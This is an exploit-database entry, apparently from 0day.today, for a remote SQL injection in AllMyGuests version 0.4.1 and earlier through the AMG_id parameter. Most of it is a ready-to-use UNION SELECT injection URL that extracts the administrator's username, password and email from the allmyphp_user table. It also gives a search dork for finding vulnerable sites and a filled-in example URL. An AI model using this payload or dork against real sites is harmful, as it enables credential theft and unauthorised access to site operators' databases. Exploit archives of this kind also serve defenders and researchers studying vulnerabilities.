AllMyGuests <= 0.4.1 (AMG_id) Remote SQL Injection Vulnerability

2008-04-19T00:00:00
ID 1337DAY-ID-2896
Type zdt
Reporter Player
Modified 2008-04-19T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
AllMyGuests <= 0.4.1 (AMG_id) Remote SQL Injection Vulnerability
================================================================



########################################################
#
#  Found by : -=Player=-
#
#  Greatz to: Lidloses_Auge, Suicide, enco, Free-Hack
#
########################################################
#
#  Script   : AllMyGuests
#
#  Site     : http://www.php-resource.net/
#
#  Dork        : "powered by AllMyGuests"
#
#  Valnu    : index.php
#
#  Parameter: AMG_id
#
#  Injection: index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3,concat_ws(0x203a20,user_name,user_password,user_email),5,6,7+from+allmyphp_user+where+user_id=1--
#
#  Example  : http://site.de/allmyguest/index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3,concat_ws(0x203a20,user_name,user_password,user_email),5,6,7+from+allmyphp_user+where+user_id=1--
#
########################################################



#  0day.today [2018-01-04]  #